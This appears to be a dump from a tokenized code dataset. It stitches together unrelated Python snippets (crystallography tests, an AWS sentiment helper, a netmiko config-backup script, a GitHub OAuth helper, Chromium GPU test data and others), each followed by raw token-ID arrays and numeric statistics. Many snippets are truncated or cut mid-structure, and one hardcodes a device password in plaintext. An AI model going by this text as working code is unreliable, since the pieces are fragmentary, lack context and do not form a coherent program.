""" xrs = get_xrs() map_target, f_calc = get_map(xrs=xrs) assert approx_equal(xrs.sites_cart(), [[0,0,0]]) for sx in [-1,0,1]: for sy in [-1,0,1]: for sz in [-1,0,1]: xrs_cp = xrs.deep_copy_scatterers() xrs_cp = xrs_cp.translate(x=0.3*sx, y=0.5*sy, z=0.7*sz) assert approx_equal(xrs_cp.sites_cart(), [[0.3*sx,0.5*sy,0.7*sz]],1.e-6) crystal_gridding = maptbx.crystal_gridding( unit_cell = xrs_cp.unit_cell(), space_group_info = xrs_cp.space_group_info(), pre_determined_n_real = map_target.accessor().all()) o = minimization.run( xray_structure = xrs_cp, miller_array = f_calc, crystal_gridding = crystal_gridding, map_target = map_target, step = d_min/4, target_type = "diffmap") assert approx_equal(xrs.sites_cart(), [[0,0,0]]) def exercise_02(): """ Exercise maptbx.target_and_gradients_diffmap in action: minimization (bigger model). """ xrs = random_structure.xray_structure( space_group_info = sgtbx.space_group_info("P212121"), elements = ["N","C","O","S","P"]*10, volume_per_atom = 50) map_target,tmp,tmp = compute_map(xray_structure = xrs) xrs_sh = xrs.deep_copy_scatterers() xrs_sh.shake_sites_in_place(mean_distance=0.8) start_error = flex.mean(xrs.distances(other = xrs_sh)) assert start_error>0.7 map_current, miller_array, crystal_gridding = compute_map( xray_structure = xrs_sh) for step in [miller_array.d_min()/4]*5: minimized = minimization.run( xray_structure = xrs_sh, miller_array = miller_array, crystal_gridding = crystal_gridding, map_target = map_target, max_iterations = 500, min_iterations = 25, step = step, geometry_restraints_manager = None, target_type = "diffmap") xrs_sh = minimized.xray_structure map_current = minimized.map_current final_error = flex.mean(xrs.distances(other = minimized.xray_structure)) assert approx_equal(start_error, 0.8, 1.e-3) assert final_error < 1.e-4 def exercise_03(): """ Exercise maptbx.target_and_gradients_simple. 
""" xrs = random_structure.xray_structure( space_group_info = sgtbx.space_group_info("P212121"), elements = ["N","C","O","S","P"]*10, volume_per_atom = 50) map_target,tmp,tmp = compute_map(xray_structure = xrs) xrs_sh = xrs.deep_copy_scatterers() xrs_sh.shake_sites_in_place(mean_distance=0.8) # t1 = maptbx.real_space_target_simple( unit_cell = xrs.unit_cell(), density_map = map_target, sites_cart = xrs_sh.sites_cart(), selection = flex.bool(xrs_sh.scatterers().size(), True)) g1 = maptbx.real_space_gradients_simple( unit_cell = xrs.unit_cell(), density_map = map_target, sites_cart = xrs_sh.sites_cart(), delta = 0.25, selection = flex.bool(xrs_sh.scatterers().size(), True)) o = maptbx.target_and_gradients_simple( unit_cell = xrs.unit_cell(), map_target = map_target, sites_cart = xrs_sh.sites_cart(), delta = 0.25, selection = flex.bool(xrs_sh.scatterers().size(), True)) assert approx_equal(t1, o.target()) for gi,gj in zip(g1, o.gradients()): assert approx_equal(gi, gj) def exercise_04(): """ Exercise maptbx.target_and_gradients_simple in action: minimization (bigger model). 
""" xrs = random_structure.xray_structure( space_group_info = sgtbx.space_group_info("P212121"), elements = ["N","C","O","S","P"]*10, volume_per_atom = 150) map_target,tmp,tmp = compute_map(xray_structure = xrs) xrs_sh = xrs.deep_copy_scatterers() xrs_sh.shake_sites_in_place(mean_distance=0.3) start_error = flex.mean(xrs.distances(other = xrs_sh)) assert start_error > 0.29 map_current, miller_array, crystal_gridding = compute_map( xray_structure = xrs_sh) xrs_sh_ = xrs_sh.deep_copy_scatterers() minimized = minimization.run( xray_structure = xrs_sh_, miller_array = miller_array, crystal_gridding = crystal_gridding, map_target = map_target, max_iterations = 500, min_iterations = 25, step = 0.5, geometry_restraints_manager = None, target_type = "simple") xrs_sh_ = xrs_sh_.replace_sites_cart(minimized.sites_cart) final_error = flex.mean(xrs.distances(other = xrs_sh_)) assert final_error < 0.015 if (__name__ == "__main__"): exercise_00() exercise_01() exercise_02() exercise_03() exercise_04()
[ 6738, 11593, 37443, 834, 1330, 7297, 198, 6738, 269, 310, 65, 87, 13, 18747, 62, 17989, 1330, 7059, 198, 6738, 269, 310, 65, 87, 1330, 2124, 2433, 198, 6738, 269, 310, 65, 87, 1330, 15121, 198, 6738, 269, 310, 65, 87, 1330, 285, 2...
2.111644
2,920
""" LED matrix """ __all__ = ['Matrix'] from .colors import Color, on, off from .fonts import font_6x8
[ 37811, 12365, 17593, 198, 37811, 198, 834, 439, 834, 796, 37250, 46912, 20520, 198, 198, 6738, 764, 4033, 669, 1330, 5315, 11, 319, 11, 572, 198, 6738, 764, 10331, 82, 1330, 10369, 62, 21, 87, 23, 628 ]
2.837838
37
from pytest import raises from datek_app_utils.env_config.base import BaseConfig from datek_app_utils.env_config.errors import InstantiationForbiddenError
[ 6738, 12972, 9288, 1330, 12073, 198, 198, 6738, 3128, 74, 62, 1324, 62, 26791, 13, 24330, 62, 11250, 13, 8692, 1330, 7308, 16934, 198, 6738, 3128, 74, 62, 1324, 62, 26791, 13, 24330, 62, 11250, 13, 48277, 1330, 24470, 3920, 1890, 3797...
3.511111
45
# -*- coding: utf-8 -*- # Name: comprehend # Version: 0.1a2 # Owner: Ruslan Korniichuk # Maintainer(s): import boto3 def get_sentiment(text, language_code='en'): """Get sentiment. Inspects text and returns an inference of the prevailing sentiment (positive, neutral, mixed, or negative). Args: text: UTF-8 text string. Each string must contain fewer that 5,000 bytes of UTF-8 encoded characters (required | type: str). language_code: language of text (not required | type: str | default: 'en'). Returns: sentiment: sentiment: positive, neutral, mixed, or negative (type: str). """ comprehend = boto3.client('comprehend') text = prepare_text(text) try: r = comprehend.detect_sentiment(Text=text, LanguageCode='en') except Exception as e: raise e sentiment = r['Sentiment'].lower() return sentiment # Example. Get sentiment of text below: # "I ordered a small and expected it to fit just right but it was a little bit # more like a medium-large. It was great quality. It's a lighter brown than # pictured but fairly close. Would be ten times better if it was lined with # cotton or wool on the inside." # text = "I ordered a small and expected it to fit just right but it was a \ # little bit more like a medium-large. It was great quality. It's a \ # lighter brown than pictured but fairly close. Would be ten times \ # better if it was lined with cotton or wool on the inside." # get_sentiment(text)
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 2, 6530, 25, 24772, 198, 2, 10628, 25, 657, 13, 16, 64, 17, 198, 2, 23853, 25, 9223, 9620, 509, 1211, 72, 488, 2724, 198, 2, 337, 2913, 10613, 7, 82, 2599, 198, ...
2.84657
554
# -*- coding: utf-8 -*- ################################################################################ ## Form generated from reading UI file 'configuredialog.ui' ## ## Created by: Qt User Interface Compiler version 5.15.2 ## ## WARNING! All changes made in this file will be lost when recompiling UI file! ################################################################################ from PySide2.QtCore import * from PySide2.QtGui import * from PySide2.QtWidgets import *
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 29113, 29113, 14468, 198, 2235, 5178, 7560, 422, 3555, 12454, 2393, 705, 11250, 1522, 498, 519, 13, 9019, 6, 198, 2235, 198, 2235, 15622, 416, 25, 33734, 11787, 264...
4.163793
116
import base64 import tempfile import requests from osbot_aws.apis import Secrets from osbot_aws.apis.Lambdas import Lambdas
[ 11748, 2779, 2414, 198, 11748, 20218, 7753, 198, 11748, 7007, 198, 6738, 220, 220, 28686, 13645, 62, 8356, 13, 499, 271, 220, 220, 220, 220, 220, 220, 220, 1330, 23561, 198, 6738, 220, 220, 28686, 13645, 62, 8356, 13, 499, 271, 13, ...
2.440678
59
from sys import argv from getopt import getopt from os import R_OK, access from string import Template DEFAULT_DATASET_FILE_PATH = "dataset/data.csv" DEFAULT_DATASET_COLUMNS = ['surface (m2)', 'height (m)', 'latitude', 'housing_type', 'longitude', 'country_code', 'city'] DEFAULT_VISU = ["scatter_plot", "histogram"] DEFAULT_RANGE = [0, 1000]
[ 6738, 25064, 1330, 1822, 85, 198, 6738, 651, 8738, 1330, 651, 8738, 198, 6738, 28686, 1330, 371, 62, 11380, 11, 1895, 198, 6738, 4731, 1330, 37350, 198, 198, 7206, 38865, 62, 35, 1404, 1921, 2767, 62, 25664, 62, 34219, 796, 366, 19608...
2.424837
153
# Must run example4.py first # Read an Excel sheet and save running config of devices using pandas import pandas as pd from netmiko import ConnectHandler # Read Excel file of .xlsx format data = pd.read_excel(io="Example4-Device-Details.xlsx", sheet_name=0) # Convert data to data frame df = pd.DataFrame(data=data) # Conevrt data frame from MGMT IP Address to a list device_ip_list = df.iloc[:, 1].tolist() # Define devices variable devices = [] for ip in device_ip_list: devices.append( { "device_type": "cisco_ios", # must be the same for all devices "ip": ip, "username": "developer", # must be the same for all devices "password": "C1sco12345", # must be the same for all devices "port": 22, # must be the same for all devices # If port for all devices is not 22 you will get an error "fast_cli": False, } ) for device in devices: # Create a connection instance with ConnectHandler(**device) as net_connect: # hostname of the current device hostname = net_connect.send_command( command_string="show version", use_textfsm=True )[0]["hostname"] run_cfg: str = net_connect.send_command(command_string="show running-config") # Create .txt for each running configuration of each device with open(file=f"{hostname}_ex7-run-cfg.txt", mode="w") as outfile: outfile.write(run_cfg.lstrip()) print("Done")
[ 2, 12039, 1057, 1672, 19, 13, 9078, 717, 198, 2, 4149, 281, 24134, 9629, 290, 3613, 2491, 4566, 286, 4410, 1262, 19798, 292, 198, 198, 11748, 19798, 292, 355, 279, 67, 198, 198, 6738, 2010, 76, 12125, 1330, 8113, 25060, 198, 198, 2,...
2.542662
586
# Copyright (C) 2021 Intel Corporation # SPDX-License-Identifier: Apache-2.0 VERIFIED_OP_REFERENCES = [ 'Abs-1', 'Acos-1', 'Add-1', 'Asin-1', 'Asinh-3', 'Assign-6', 'AvgPool-1', 'BatchNormInference-5', 'BatchToSpace-2', 'BinaryConvolution-1', 'Broadcast-1', 'Broadcast-3', 'Bucketize-3', 'Ceiling-1', 'CTCGreedyDecoder-1', 'CTCGreedyDecoderSeqLen-6', 'Concat-1', 'Convert-1', 'ConvertLike-1', 'Convolution-1', 'Constant-1', 'Cos-1', 'Cosh-1', 'DeformableConvolution-1', 'DeformablePSROIPooling-1', 'DepthToSpace-1', 'DetectionOutput-1', 'Divide-1', 'ExperimentalDetectronDetectionOutput-6', 'ExperimentalDetectronGenerateProposalsSingleImage-6', 'ExperimentalDetectronPriorGridGenerator-6', 'ExperimentalDetectronROIFeatureExtractor-6', 'ExperimentalDetectronTopKROIs-6', 'FakeQuantize-1', 'Floor-1' 'FloorMod-1' 'GRUSequence-5', 'Gather-1', 'GatherElements-6', 'GatherND-5', 'Gelu-7', 'GRN-1', 'GroupConvolution-1', 'GroupConvolutionBackpropData-1', 'GRUSequence-5', 'HSigmoid-5', 'HSwish-4', 'HardSigmoid-1', 'Interpolate-4', 'LRN-1', 'LSTMCell-4', 'LSTMSequence-5', 'LogSoftmax-5', 'Loop-5', 'MVN-6', 'Maximum-1', 'MaxPool-1', 'Mish-4', 'Multiply-1', 'Negative-1', 'NonMaxSuppression-4', 'NonMaxSuppression-5', 'NonZero-3', 'NormalizeL2-1', 'PriorBox-1', 'PriorBoxClustered-1', 'Proposal-1', 'Proposal-4', 'PSROIPooling-1', 'RNNSequence-5', 'ROIAlign-3', 'ROIPooling-2', 'Range-1', 'Range-4', 'ReadValue-6', 'ReduceL1-4', 'ReduceL2-4', 'ReduceLogicalAnd-1', 'ReduceLogicalOr-1', 'ReduceMax-1', 'ReduceMean-1', 'ReduceMin-1', 'ReduceProd-1', 'ReduceSum-1', 'RegionYOLO-1', 'Relu-1', 'ReorgYOLO-2', 'Result-1' 'Round-5', 'SpaceToDepth-1', 'ScatterNDUpdate-4', 'Select-1', 'ShapeOf-1', 'ShapeOf-3', 'ShuffleChannels-1', 'Sigmoid-1', 'Sign-1', 'Sin-1', 'Sinh-1' 'SoftPlus-4', 'Softmax-1', 'Split-1', 'Squeeze-1', 'StridedSlice-1', 'Subtract-1', 'Swish-4', 'Tile-1', 'TopK-1', 'TopK-3', 'Transpose-1', 'Unsqueeze-1', 'VariadicSplit-1', ]
[ 2, 15069, 357, 34, 8, 33448, 8180, 10501, 198, 2, 30628, 55, 12, 34156, 12, 33234, 7483, 25, 24843, 12, 17, 13, 15, 198, 198, 5959, 28343, 62, 3185, 62, 2200, 24302, 24181, 1546, 796, 685, 198, 220, 220, 220, 705, 24849, 12, 16, ...
1.837442
1,298
"""Utilities for interacting with GitHub""" import os import json import webbrowser import stat import sys from git import Repo from .context import Context event_dict = { "added_to_project": ( lambda event: "{} added the issue to a project.".format(event["actor"]["login"]) ), "assigned": ( lambda event: "{} assigned the issue to {}.".format( event["actor"]["login"], event["assignee"]["login"] ) ), "closed": (lambda event: "{} closed this issue.".format(event["actor"]["login"])), "converted_note_to_issue": ( lambda event: "{} created this issue from a note.".format( event["actor"]["login"] ) ), "demilestoned": (lambda event: "The issue was removed from a milestone."), "head_ref_deleted": (lambda event: "The pull request's branch was deleted."), "head_ref_restored": (lambda event: "The pull request's branch was restored."), "labelled": ( lambda event: "{} added {} label to the issue.".format( event["actor"]["login"], event["label"] ) ), "locked": ( lambda event: "The issue was locked by {}.".format(event["actor"]["login"]) ), "mentioned": ( lambda event: "{} was mentioned in the issue's body.".format( event["actor"]["login"] ) ), "marked_as_duplicate": ( lambda event: "The issue was marked duplicate by {}.".format( event["actor"]["login"] ) ), "merged": ( lambda event: "The issue was merged by {}.".format(event["actor"]["login"]) ), "milestoned": (lambda event: "The issue was added to a milestone."), "moved_columns_in_project": ( lambda event: "The issue was moved between columns in a project board." 
), "referenced": (lambda event: "The issue was referenced from a commit message."), "renamed": (lambda event: "The title of the issue was changed."), "reopened": ( lambda event: "The issue was reopened by {}".format(event["actor"]["login"]) ), "review_dismissed": ( lambda event: "{} dismissed a review from the pull request.".format( event["actor"]["login"] ) ), "review_requested": ( lambda event: "{} requested review from the subject on this pull request.".format( event["actor"]["login"] ) ), "review_request_removed": ( lambda event: "{} removed the review request for the subject on this pull request.".format( event["actor"]["login"] ) ), "subscribed": ( lambda event: "{} subscribed to receive notifications for the issue.".format( event["actor"]["login"] ) ), "transferred": (lambda event: "The issue was transferred to another repository."), "unassigned": ( lambda event: "{} was unassigned from the issue.".format( event["actor"]["login"] ) ), "unlabeled": (lambda event: "A label was removed from the issue."), "unlocked": ( lambda event: "The issue was unlocked by {}".format(event["actor"]["login"]) ), "unmarked_as_duplicate": (lambda event: "The was unmarked as dublicate."), "user_blocked": (lambda event: "A user was blocked from the organization."), } def authorize(ghub, reauthorize=False, fromenv=False): """Authorize a user for GHub Keyword arguments: ghub -- the ghub object that needs authorization reauthorize -- performs authorization again (default False) """ if fromenv: oauth_data = json.loads(os.environ["GHUB_CRED"]) ghub.oauth_data = oauth_data ghub.github.token = oauth_data return True if not os.path.isfile(ghub.data_path / ghub.auth_filename) or reauthorize: authorization_base_url = "https://github.com/login/oauth/authorize" token_url = "https://github.com/login/oauth/access_token" authorization_url, _ = ghub.github.authorization_url(authorization_base_url) webbrowser.open(authorization_url) print("Please visit this site and grant access: 
{}".format(authorization_url)) redirect_response = input( "Please enter the URL you were redirected to after granting access: " ) try: response = ghub.github.fetch_token( token_url, client_secret=ghub.client_secret, authorization_response=redirect_response, ) except Exception as e: print(e) print( "Network Error. Make sure you have a working internet connection and try again." ) sys.exit(1) if not os.path.isdir(ghub.data_path): os.makedirs(ghub.data_path) data_file = open(ghub.data_path / ghub.auth_filename, "w+") json.dump(response, data_file) data_file.close() os.chmod(ghub.data_path / ghub.auth_filename, stat.S_IRUSR | stat.S_IWUSR) ghub.oauth_data = response return True else: data_file = open(ghub.data_path / ghub.auth_filename, "r") oauth_data = json.loads(data_file.read()) data_file.close() ghub.oauth_data = oauth_data ghub.github.token = oauth_data return True
[ 37811, 18274, 2410, 329, 24986, 351, 21722, 37811, 198, 11748, 28686, 198, 11748, 33918, 198, 11748, 3992, 40259, 198, 11748, 1185, 198, 11748, 25064, 198, 6738, 17606, 1330, 1432, 78, 198, 198, 6738, 764, 22866, 1330, 30532, 198, 198, 15...
2.404891
2,208
# Generated by Django 3.0.7 on 2020-09-18 05:52 from django.conf import settings from django.db import migrations, models import django.db.models.deletion import multiselectfield.db.fields
[ 2, 2980, 515, 416, 37770, 513, 13, 15, 13, 22, 319, 12131, 12, 2931, 12, 1507, 8870, 25, 4309, 198, 198, 6738, 42625, 14208, 13, 10414, 1330, 6460, 198, 6738, 42625, 14208, 13, 9945, 1330, 15720, 602, 11, 4981, 198, 11748, 42625, 14...
3.080645
62
import pytest import gen from dcos_installer import cli
[ 11748, 12972, 9288, 198, 198, 11748, 2429, 198, 6738, 288, 6966, 62, 17350, 263, 1330, 537, 72, 628, 628 ]
3.157895
19
#!/usr/bin/env python3

import sys
from random import randint
import os

# Optional graph back-ends.  A missing package is reported through the
# "gPrint" wire protocol (and flushed immediately so the front-end sees it)
# instead of aborting the whole module import.
try:
    import networkx as nx
except ImportError:  # was a bare except:; only a failed import is expected here
    print("gPrint#-1#" + "networkx not installed for " + sys.executable)
    sys.stdout.flush()
try:
    import igraph as ig
except ImportError:
    print("gPrint#-1#" + "igraph not installed for " + sys.executable)
    sys.stdout.flush()  # was missing: keep both failure paths consistent
# xml.etree.cElementTree was removed in Python 3.9; ElementTree is the
# supported (and since 3.3 equally fast) module.
import xml.etree.ElementTree as ET
import math

# debugging = False


def rgbFormatter(colorRGB):
    """Format an (r, g, b) sequence as the protocol string ``rgb(r,g,b)``."""
    r, g, b = colorRGB[0], colorRGB[1], colorRGB[2]
    channels = ",".join(str(c).rstrip() for c in (r, g, b))
    return "rgb({})".format(channels).rstrip()


def hexFormatter(colorHex):
    """Format a hex color (with or without a leading ``#``) as ``hex(rrggbb)``."""
    if colorHex and colorHex[0] == "#":  # guard: empty input no longer raises
        colorHex = colorHex[1:]
    return "hex(" + str(colorHex).rstrip() + ")"


def vertexId(vertex):
    """Return the id of *vertex*, accepting either a Vertex object or a raw id."""
    if isinstance(vertex, Vertex):
        return vertex.getId()
    return vertex


def edgeId(edge):
    """Return the id of *edge*, accepting either an Edge object or a raw id."""
    if isinstance(edge, Edge):
        return edge.getId()
    return edge


def extractIdFromProperties(stringFromGralog):
    """Extract the value of the ``id`` key from a ``key=value,...`` string.

    Returns None when no ``id`` key is present.
    """
    for prop in stringFromGralog.split(","):
        propVal = prop.split("=")
        if propVal[0] == "id":
            return propVal[1]
    return None


def edgeSplitter(edge):
    """Serialize an edge reference for the Gralog wire format.

    Accepts a ``(start, end)`` tuple of vertices/ids, a numeric edge id,
    or an Edge object.
    """
    if isinstance(edge, tuple) and len(edge) == 2:  # edge as (start, end) pair
        return str(vertexId(edge[0])).rstrip() + "," + str(vertexId(edge[1])).rstrip()
    if isinstance(edge, int):  # edge given by its id
        return str(edge).rstrip()
    return str(edge.getId()).rstrip()  # edge has type Edge
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 198, 11748, 25064, 198, 6738, 4738, 1330, 43720, 600, 198, 11748, 28686, 198, 28311, 25, 198, 220, 220, 220, 220, 220, 220, 220, 1330, 3127, 87, 355, 299, 87, 198, 16341, 25, 198...
2.076456
824
# -*- coding: utf-8 -*- """Define the base module for server test.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import sys from influxdb.tests import using_pypy from influxdb.tests.server_tests.influxdb_instance import InfluxDbInstance from influxdb.client import InfluxDBClient if not using_pypy: from influxdb.dataframe_client import DataFrameClient
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 37811, 7469, 500, 262, 2779, 8265, 329, 4382, 1332, 526, 15931, 198, 198, 6738, 11593, 37443, 834, 1330, 4112, 62, 11748, 198, 6738, 11593, 37443, 834, 1330, 7297, 198, ...
3.347518
141
# -*- coding: utf-8 -*- #------------------------------------------------------------------------------ # file: $Id$ # auth: Philip J Grabner <grabner@cadit.com> # date: 2013/10/21 # copy: (C) Copyright 2013 Cadit Health Inc., All Rights Reserved. #------------------------------------------------------------------------------ # todo: this could be smarter... for example, it could: # - detect when references resolve to the same content, but # by different Content-IDs # - detect when multipart sections could collapse to the same # semantic structure from __future__ import absolute_import import unittest, email from .util import smtpHeaderFormat #------------------------------------------------------------------------------ def canonicalHeaders(message, ignore=None): ''' Returns a canonical string representation of the `message` headers, with the following changes made: * The MIME boundary specified in the "Content-Type" header, if specified, removed. * Any headers listed in `ignore` are removed. :Parameters: ignore : list(str), optional, default: ['Content-Transfer-Encoding'] List of headers that should not be included in the canonical form. 
''' if ignore is None: ignore = ['Content-Transfer-Encoding'] ignore = [key.lower() for key in ignore] hdrs = {key.lower(): '; '.join(sorted(message.get_all(key))) for key in message.keys() if key.lower() not in ignore} hdrs['content-type'] = '; '.join(['='.join(filter(None, pair)) for pair in message.get_params() if pair[0].lower() != 'boundary']) return '\n'.join([ smtpHeaderFormat(key) + ': ' + hdrs[key] for key in sorted(hdrs.keys())]) + '\n' #------------------------------------------------------------------------------ #------------------------------------------------------------------------------ #------------------------------------------------------------------------------ #------------------------------------------------------------------------------ # end of $Id$ #------------------------------------------------------------------------------
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 2, 10097, 26171, 198, 2, 2393, 25, 720, 7390, 3, 198, 2, 6284, 25, 14576, 449, 25339, 1008, 1279, 32393, 1008, 31, 66, 324, 270, 13, 785, 29, 198, 2, 3128, 25, 221...
3.579545
616
# Copyright 2015 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. # This dictionary of GPU information was captured from a run of # Telemetry on a Linux workstation with NVIDIA GPU. It helps test # telemetry.internal.platform's GPUInfo class, and specifically the # attributes it expects to find in the dictionary; if the code changes # in an incompatible way, tests using this fake GPU info will begin # failing, indicating this fake data must be updated. # # To regenerate it, import pdb in # telemetry/internal/platform/gpu_info.py and add a call to # pdb.set_trace() in GPUInfo.FromDict before the return statement. # Print the attrs dictionary in the debugger and copy/paste the result # on the right-hand side of this assignment. Then run: # # pyformat [this file name] | sed -e "s/'/'/g" # # and put the output into this file. FAKE_GPU_INFO = { 'feature_status': { 'flash_stage3d': 'enabled', 'gpu_compositing': 'enabled', 'video_decode': 'unavailable_software', 'flash_3d': 'enabled', 'webgl': 'enabled', 'video_encode': 'enabled', 'multiple_raster_threads': 'enabled_on', '2d_canvas': 'unavailable_software', 'rasterization': 'disabled_software', 'flash_stage3d_baseline': 'enabled' }, 'aux_attributes': { 'optimus': False, 'sandboxed': True, 'basic_info_state': 1, 'adapter_luid': 0.0, 'driver_version': '331.79', 'direct_rendering': True, 'amd_switchable': False, 'context_info_state': 1, 'process_crash_count': 0, 'pixel_shader_version': '4.40', 'gl_ws_version': '1.4', 'can_lose_context': False, 'driver_vendor': 'NVIDIA', 'max_msaa_samples': '64', 'software_rendering': False, 'gl_version': '4.4.0 NVIDIA 331.79', 'gl_ws_vendor': 'NVIDIA Corporation', 'vertex_shader_version': '4.40', 'initialization_time': 1.284043, 'gl_reset_notification_strategy': 33362, 'gl_ws_extensions': 'GLX_EXT_visual_info GLX_EXT_visual_rating GLX_SGIX_fbconfig ' 'GLX_SGIX_pbuffer GLX_SGI_video_sync 
GLX_SGI_swap_control ' 'GLX_EXT_swap_control GLX_EXT_swap_control_tear ' 'GLX_EXT_texture_from_pixmap GLX_EXT_buffer_age ' 'GLX_ARB_create_context GLX_ARB_create_context_profile ' 'GLX_EXT_create_context_es_profile ' 'GLX_EXT_create_context_es2_profile ' 'GLX_ARB_create_context_robustness GLX_ARB_multisample ' 'GLX_NV_float_buffer GLX_ARB_fbconfig_float GLX_NV_swap_group' ' GLX_EXT_framebuffer_sRGB GLX_NV_multisample_coverage ' 'GLX_NV_copy_image GLX_NV_video_capture ', 'gl_renderer': 'Quadro 600/PCIe/SSE2', 'driver_date': '', 'gl_vendor': 'NVIDIA Corporation', 'gl_extensions': 'GL_AMD_multi_draw_indirect GL_ARB_arrays_of_arrays ' 'GL_ARB_base_instance GL_ARB_blend_func_extended ' 'GL_ARB_buffer_storage GL_ARB_clear_buffer_object ' 'GL_ARB_clear_texture GL_ARB_color_buffer_float ' 'GL_ARB_compatibility GL_ARB_compressed_texture_pixel_storage' ' GL_ARB_conservative_depth GL_ARB_compute_shader ' 'GL_ARB_compute_variable_group_size GL_ARB_copy_buffer ' 'GL_ARB_copy_image GL_ARB_debug_output ' 'GL_ARB_depth_buffer_float GL_ARB_depth_clamp ' 'GL_ARB_depth_texture GL_ARB_draw_buffers ' 'GL_ARB_draw_buffers_blend GL_ARB_draw_indirect ' 'GL_ARB_draw_elements_base_vertex GL_ARB_draw_instanced ' 'GL_ARB_enhanced_layouts GL_ARB_ES2_compatibility ' 'GL_ARB_ES3_compatibility GL_ARB_explicit_attrib_location ' 'GL_ARB_explicit_uniform_location ' 'GL_ARB_fragment_coord_conventions ' 'GL_ARB_fragment_layer_viewport GL_ARB_fragment_program ' 'GL_ARB_fragment_program_shadow GL_ARB_fragment_shader ' 'GL_ARB_framebuffer_no_attachments GL_ARB_framebuffer_object ' 'GL_ARB_framebuffer_sRGB GL_ARB_geometry_shader4 ' 'GL_ARB_get_program_binary GL_ARB_gpu_shader5 ' 'GL_ARB_gpu_shader_fp64 GL_ARB_half_float_pixel ' 'GL_ARB_half_float_vertex GL_ARB_imaging ' 'GL_ARB_indirect_parameters GL_ARB_instanced_arrays ' 'GL_ARB_internalformat_query GL_ARB_internalformat_query2 ' 'GL_ARB_invalidate_subdata GL_ARB_map_buffer_alignment ' 'GL_ARB_map_buffer_range GL_ARB_multi_bind ' 
'GL_ARB_multi_draw_indirect GL_ARB_multisample ' 'GL_ARB_multitexture GL_ARB_occlusion_query ' 'GL_ARB_occlusion_query2 GL_ARB_pixel_buffer_object ' 'GL_ARB_point_parameters GL_ARB_point_sprite ' 'GL_ARB_program_interface_query GL_ARB_provoking_vertex ' 'GL_ARB_robust_buffer_access_behavior GL_ARB_robustness ' 'GL_ARB_sample_shading GL_ARB_sampler_objects ' 'GL_ARB_seamless_cube_map GL_ARB_separate_shader_objects ' 'GL_ARB_shader_atomic_counters GL_ARB_shader_bit_encoding ' 'GL_ARB_shader_draw_parameters GL_ARB_shader_group_vote ' 'GL_ARB_shader_image_load_store GL_ARB_shader_image_size ' 'GL_ARB_shader_objects GL_ARB_shader_precision ' 'GL_ARB_query_buffer_object ' 'GL_ARB_shader_storage_buffer_object GL_ARB_shader_subroutine' ' GL_ARB_shader_texture_lod GL_ARB_shading_language_100 ' 'GL_ARB_shading_language_420pack ' 'GL_ARB_shading_language_include ' 'GL_ARB_shading_language_packing GL_ARB_shadow ' 'GL_ARB_stencil_texturing GL_ARB_sync ' 'GL_ARB_tessellation_shader GL_ARB_texture_border_clamp ' 'GL_ARB_texture_buffer_object ' 'GL_ARB_texture_buffer_object_rgb32 ' 'GL_ARB_texture_buffer_range GL_ARB_texture_compression ' 'GL_ARB_texture_compression_bptc ' 'GL_ARB_texture_compression_rgtc GL_ARB_texture_cube_map ' 'GL_ARB_texture_cube_map_array GL_ARB_texture_env_add ' 'GL_ARB_texture_env_combine GL_ARB_texture_env_crossbar ' 'GL_ARB_texture_env_dot3 GL_ARB_texture_float ' 'GL_ARB_texture_gather GL_ARB_texture_mirror_clamp_to_edge ' 'GL_ARB_texture_mirrored_repeat GL_ARB_texture_multisample ' 'GL_ARB_texture_non_power_of_two GL_ARB_texture_query_levels ' 'GL_ARB_texture_query_lod GL_ARB_texture_rectangle ' 'GL_ARB_texture_rg GL_ARB_texture_rgb10_a2ui ' 'GL_ARB_texture_stencil8 GL_ARB_texture_storage ' 'GL_ARB_texture_storage_multisample GL_ARB_texture_swizzle ' 'GL_ARB_texture_view GL_ARB_timer_query ' 'GL_ARB_transform_feedback2 GL_ARB_transform_feedback3 ' 'GL_ARB_transform_feedback_instanced GL_ARB_transpose_matrix ' 'GL_ARB_uniform_buffer_object 
GL_ARB_vertex_array_bgra ' 'GL_ARB_vertex_array_object GL_ARB_vertex_attrib_64bit ' 'GL_ARB_vertex_attrib_binding GL_ARB_vertex_buffer_object ' 'GL_ARB_vertex_program GL_ARB_vertex_shader ' 'GL_ARB_vertex_type_10f_11f_11f_rev ' 'GL_ARB_vertex_type_2_10_10_10_rev GL_ARB_viewport_array ' 'GL_ARB_window_pos GL_ATI_draw_buffers GL_ATI_texture_float ' 'GL_ATI_texture_mirror_once GL_S3_s3tc GL_EXT_texture_env_add' ' GL_EXT_abgr GL_EXT_bgra GL_EXT_bindable_uniform ' 'GL_EXT_blend_color GL_EXT_blend_equation_separate ' 'GL_EXT_blend_func_separate GL_EXT_blend_minmax ' 'GL_EXT_blend_subtract GL_EXT_compiled_vertex_array ' 'GL_EXT_Cg_shader GL_EXT_depth_bounds_test ' 'GL_EXT_direct_state_access GL_EXT_draw_buffers2 ' 'GL_EXT_draw_instanced GL_EXT_draw_range_elements ' 'GL_EXT_fog_coord GL_EXT_framebuffer_blit ' 'GL_EXT_framebuffer_multisample ' 'GL_EXTX_framebuffer_mixed_formats ' 'GL_EXT_framebuffer_multisample_blit_scaled ' 'GL_EXT_framebuffer_object GL_EXT_framebuffer_sRGB ' 'GL_EXT_geometry_shader4 GL_EXT_gpu_program_parameters ' 'GL_EXT_gpu_shader4 GL_EXT_multi_draw_arrays ' 'GL_EXT_packed_depth_stencil GL_EXT_packed_float ' 'GL_EXT_packed_pixels GL_EXT_pixel_buffer_object ' 'GL_EXT_point_parameters GL_EXT_provoking_vertex ' 'GL_EXT_rescale_normal GL_EXT_secondary_color ' 'GL_EXT_separate_shader_objects ' 'GL_EXT_separate_specular_color ' 'GL_EXT_shader_image_load_store GL_EXT_shadow_funcs ' 'GL_EXT_stencil_two_side GL_EXT_stencil_wrap GL_EXT_texture3D' ' GL_EXT_texture_array GL_EXT_texture_buffer_object ' 'GL_EXT_texture_compression_dxt1 ' 'GL_EXT_texture_compression_latc ' 'GL_EXT_texture_compression_rgtc ' 'GL_EXT_texture_compression_s3tc GL_EXT_texture_cube_map ' 